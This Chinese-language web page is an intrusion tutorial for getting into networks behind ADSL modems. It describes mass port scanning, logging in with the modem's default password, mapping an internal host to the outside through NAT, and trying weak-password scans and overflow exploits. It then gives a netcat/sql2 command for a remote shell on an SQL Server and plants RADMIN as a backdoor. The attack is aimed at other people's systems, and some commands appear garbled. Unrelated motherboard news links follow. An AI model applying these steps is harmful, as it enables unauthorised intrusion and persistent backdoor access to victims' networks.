2021-05-12 11:00:58
如何穿透ADSL路由入侵內網
穿透ADSL路由入侵內網方法:
1.掃描
現在很多ADSL MODEM都是通過80 23 21三個埠來管理,但80 21埠有很多伺服器都有開啟,沒怎麼特徵性,於是選擇了23埠,開啟SUPPERSCAN,填上所在地區的IP段,跨多幾段都沒關係,反正SUPPERSCAN的速度就是快)眨眼間,結果出來了,開23的主機還真不小啊:)我挑了幾臺出來,在瀏覽器那裡輸入IP:218.xxx.xxx.xxx,OK。登陸對話方塊出來了,輸入USER:ADSL pass:adsl1234(因為這裡的adsl modem一般是華碩的,預設是adsl adsl1234)bingle 一矢中的。
2.對映
入侵已經成功了一半,要進一步入侵內網,要進行埠對映,但是連內網的拓撲,都不知道(更不用說內網主機的埠開放情況了)又怎麼對映呢?一般來說,MODEM的內網IP預設是192.168.1.1,而大多數就把自己主機的IP設成192.168.1.2。因此只要試試把192.168.1.2的埠對映出來就行了(但如果使用了dhcp就麻煩了)把整臺主機透明地對映到外網,具體做法如下:進入NAT選項---新增NAT規則---BAMID---填入主機IP:192.168.1.2,到此192.168.1.2已經透明地對映到192.168.1.1上了,存取ADSL MODEM就等於存取主機192.168.1.2了。
3.檢測漏洞
現在再請出SUPPERSCAN對218。xxx.xxx.xxx進行掃描,掃描結果已經不同了,開放的埠是139 1433等,剛才只是開放了80 23 21而已(也就是說對映已經成功了)該是X-SCAN出手了,掃弱口令最好不過了。
4.溢位
既然沒有弱口令,也沒開80,那隻好從逸出方面著手了,但沒開80 21 也就webdav .sevr-u的溢位沒戲了,嚮導了RPC溢位,但實踐證明RPC溢位也是不行的,LSASS溢位也不行。
5.募然回首,那人卻在,燈火闌珊處
這時侯,目光轉移到1433上了,於是nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99 bingle 成功地得到一個shell了。
6.設定後門
到這裡,入侵已經成功了,餘下的是掃尾留後門,至於後門,用FTP上傳RADMIN上去就可以了。
相關文章
-
7+2強化供電!599元梅捷SY-狂龍H510M圖賞
除了廣為人知的Z590和B560之外,英特爾還發布了入門級的H510晶片組,也是上一代H410晶片組的升級版。 在相容性方面,H510晶片組與Z590晶片組和B560晶片組沒有什麼區別,都可以相容1
2021-05-10 19:00:28
-
支援5333高頻記憶體!技嘉小雕PRO B560M主機板圖賞
Intel第十一代酷睿已經上市,新架構帶來了巨大的IPC提升幅度,同時,Intel還開放了B560/H570主機板的記憶體超頻功能,這使得主流玩家也可以輕鬆享受高頻記憶體帶來的流暢遊戲體驗。
2021-05-09 16:00:04
-
24K純金!微星MEG Z590 ACE GOLD EDITION戰神至臻圖賞
顯示卡、散熱器、風扇都能玩RGB,機箱中,主機板幾乎是最不起眼的存在。 而近日,微星推出了一款亮眼的主機板,首次用上了24K純金設計,它就是MEG Z590 ACE戰神至臻,一起來瞧瞧。 MEG
2021-05-07 22:00:14